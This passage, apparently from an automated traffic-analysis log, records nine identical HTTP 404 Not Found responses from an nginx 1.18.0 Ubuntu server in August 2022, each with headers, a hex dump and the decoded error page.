                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:49 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:50 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:51 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:54 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:55 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:56 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:58 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:59 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:33:03 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
